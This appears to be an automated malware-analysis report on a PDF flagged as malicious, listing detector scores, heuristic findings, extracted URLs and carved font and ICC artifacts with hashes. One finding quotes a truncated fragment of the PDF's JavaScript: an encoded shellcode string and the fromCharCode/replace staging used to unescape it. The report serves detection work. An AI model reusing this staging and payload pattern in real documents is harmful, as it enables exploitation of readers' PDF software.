MALICIOUS
Risk Score: 86
Machine Learning
- Nyx PDF Classifier suspicious score 0.4319
Heuristics (4)
- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@150b@0005@9090@9090@9090@9090@d184@71fa@fd11@30b1@26ca@3a3a@5d55@7a7a@1212@1175@04a5@c7f7@eaea@0707@4c4c@5dd6@0646@c8c4@e962@1c6c@a0bc@1eb3@56dd@7737@030b@cf46@4207@c73b@dd56@cd1d@bb30@7a38@4e72@6ee5@104c@ccce@c5bd@6467@d40e@129b@96cb@f60e@9e15@0942@9880@d853@7d26@af8f@b8bb@ef35@e3aa@0a81@685c@840f@7073@e095@778b@ae16@7b3c@9ffa@5e2a@90c0@93aa@ … var asT = String.fromCharCode(37,117); var forme2 = forme1.replace(/@/g,asT);
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.monotype.com (Monotype): referenced by PDF JavaScript
  - http://www.foxitsoftware.com: referenced by PDF JavaScript
  - http://www.monotype.com/html/mtname/ms_timesnewroman.html: referenced by PDF JavaScript
  - http://www.monotype.com/html/mtname/ms_welcome.html: referenced by PDF JavaScript
  - http://www.monotype.com/html/type/license.html: referenced by PDF JavaScript
  - http://www.microsoft.com/truetype/fonts/wingdings/: referenced by PDF JavaScript
  - http://www.microsoft.com/truetype/designers/bandh/: referenced by PDF JavaScript
  - http://www.monotype.com/html/mtname/ms_arial.html: referenced by PDF JavaScript
  - http://www.monotype.com/html/mtname/ms_welcome.html: referenced by PDF JavaScript
  - http://www.monotype.com/html/type/license.html: referenced by PDF JavaScript
  - http://www.iec.ch: in PDF document text
Extracted artifacts (7)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| icc_00_off000000b2.icc | pdf-icc-profile | PDF ICC profile at offset 0xB2 | 3144 bytes | 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e |
| font_00_sfnt_off00000c2b.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0xC2B | 34872 bytes | 83831dd521463c628ccf5326b2691f9f9e831e8babc26932321a4a5f7124936e |
| font_01_sfnt_off000065d1.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x65D1 | 52748 bytes | f27c297b9da0fead241168e20fba12b6892f2a4a6ac5a1901a54f733a4b106cc |
| font_02_sfnt_off0000f28d.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0xF28D | 9696 bytes | c869b49ceacdf99ae46dab3f76366706417a1d101856a104145e0440ad292ba1 |
| font_03_sfnt_off00010695.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x10695 | 13336 bytes | 7d830b325f869950ddfd01daa675f402578dd99a87d67862120e347535416ab7 |
| font_04_sfnt_off000123b3.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x123B3 | 29592 bytes | 3fa2cf1f95426906a95a6a9761c7eb9385ce6c6c5aaac164bd1e6da2fb1c9e67 |
| font_05_sfnt_off00018263.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x18263 | 15484 bytes | f17dc23034f5d7335316bcceb62cc449fc05a4fcee4619c6dffc237c268b5f2e |